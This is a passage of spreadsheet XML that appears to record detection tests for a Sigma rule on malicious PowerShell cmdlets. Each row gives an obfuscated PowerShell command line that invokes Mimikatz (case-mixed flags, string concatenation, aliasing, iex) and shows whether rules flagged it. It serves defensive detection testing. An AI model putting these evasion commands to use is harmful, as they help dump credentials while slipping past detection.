      </c>
      <c r="K2915" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2916" ht="15.75" customHeight="1" s="42">
      <c r="A2916" s="43" t="n"/>
      <c r="B2916" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2916" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2916" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2916" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2916" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2916" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2916" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2916" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2916" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2917" ht="15.75" customHeight="1" s="42">
      <c r="A2917" s="43" t="n"/>
      <c r="B2917" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2917" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2917" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2917" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2917" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2917" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2917" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2917" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2917" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2918" ht="15.75" customHeight="1" s="42">
      <c r="A2918" s="43" t="n"/>
      <c r="B2918" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2918" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2918" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2918" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2918" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2918" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2918" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2918" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2918" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2919" ht="15.75" customHeight="1" s="42">
      <c r="A2919" s="43" t="n"/>
      <c r="B2919" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2919" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2919" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2919" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2919" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2919" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2919" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2919" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2919" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2920" ht="15.75" customHeight="1" s="42">
      <c r="A2920" s="43" t="n"/>
      <c r="B2920" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2920" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2920" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2920" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2920" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2920" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2920" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2920" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2920" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2921" ht="15.75" customHeight="1" s="42">
      <c r="A2921" s="43" t="n"/>
      <c r="B2921" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2921" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2921" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2921" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2921" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2921" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2921" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2921" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2921" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2922" ht="15.75" customHeight="1" s="42">
      <c r="A2922" s="43" t="n"/>
      <c r="B2922" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2922" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2922" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2922" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2922" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2922" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2922" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2922" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2922" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2923" ht="15.75" customHeight="1" s="42">
      <c r="A2923" s="43" t="n"/>
      <c r="B2923" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2923" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2923" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2923" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2923" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2923" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2923" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2923" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2923" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2924" ht="15.75" customHeight="1" s="42">
      <c r="A2924" s="43" t="n"/>
      <c r="B2924" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2924" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2924" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2924" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2924" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I292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24" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2924" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2925" ht="15.75" customHeight="1" s="42">
      <c r="A2925" s="43" t="n"/>
      <c r="B2925" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2925" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2925" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2925" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2925" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I292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25" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2925" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2926" ht="15.75" customHeight="1" s="42">
      <c r="A2926" s="43" t="n"/>
      <c r="B2926" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2926" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2926" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2926" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2926" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I292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26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2926" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2927" ht="15.75" customHeight="1" s="42">
      <c r="A2927" s="43" t="n"/>
      <c r="B2927" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2927" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2927" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2927" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2927" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I292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27" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2927" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2928" ht="15.75" customHeight="1" s="42">
      <c r="A2928" s="44" t="n"/>
      <c r="B2928" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2928" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2928" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2928" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2928" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2928" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2928" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2928" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2928" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2929" ht="15.75" customHeight="1" s="42">
      <c r="A2929" s="44" t="n"/>
      <c r="B2929" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2929" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2929" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2929" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2929" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2929" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2929" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2929" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2929" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2930" ht="15.75" customHeight="1" s="42">
      <c r="A2930" s="43" t="n"/>
      <c r="B2930" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2930" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2930" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2930" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2930" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2930" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2930" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2930" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2930" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2931" ht="15.75" customHeight="1" s="42">
      <c r="A2931" s="43" t="n"/>
      <c r="B2931" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2931" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2931" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2931" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2931" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2931" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2931" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2931" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2931" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2932" ht="15.75" customHeight="1" s="42">
      <c r="A2932" s="43" t="n"/>
      <c r="B2932" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2932" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2932" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2932" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2932" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2932" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2932" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2932" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2932" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2933" ht="15.75" customHeight="1" s="42">
      <c r="A2933" s="43" t="n"/>
      <c r="B2933" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2933" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2933" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2933" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2933" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2933" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2934" ht="15.75" customHeight="1" s="42">
      <c r="A2934" s="43" t="n"/>
      <c r="B2934" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2934" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2934" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2934" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2934" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2934" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2935" ht="15.75" customHeight="1" s="42">
      <c r="A2935" s="43" t="n"/>
      <c r="B2935" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2935" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2935" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2935" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2935" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2935" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2936" ht="15.75" customHeight="1" s="42">
      <c r="A2936" s="43" t="n"/>
      <c r="B2936" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2936" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2936" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2936" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2936" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2936" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2937" ht="15.75" customHeight="1" s="42">
      <c r="A2937" s="43" t="n"/>
      <c r="B2937" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2937" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2937" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2937" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2937" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2937" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2938" ht="15.75" customHeight="1" s="42">
      <c r="A2938" s="43" t="n"/>
      <c r="B2938" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2938" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2938" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2938" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2938" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2938" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2939" ht="15.75" customHeight="1" s="42">
      <c r="A2939" s="43" t="n"/>
      <c r="B2939" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2939" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2939" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2939" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2939" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293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39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2939" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2940" ht="15.75" customHeight="1" s="42">
      <c r="A2940" s="43" t="n"/>
      <c r="B2940" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2940" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2940" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2940" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2940" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2940" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2941" ht="15.75" customHeight="1" s="42">
      <c r="A2941" s="43" t="n"/>
      <c r="B2941" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2941" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2941" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2941" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2941" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2941" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2942" ht="15.75" customHeight="1" s="42">
      <c r="A2942" s="43" t="n"/>
      <c r="B2942" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2942" s="44" t="inlineStr">
        <is>
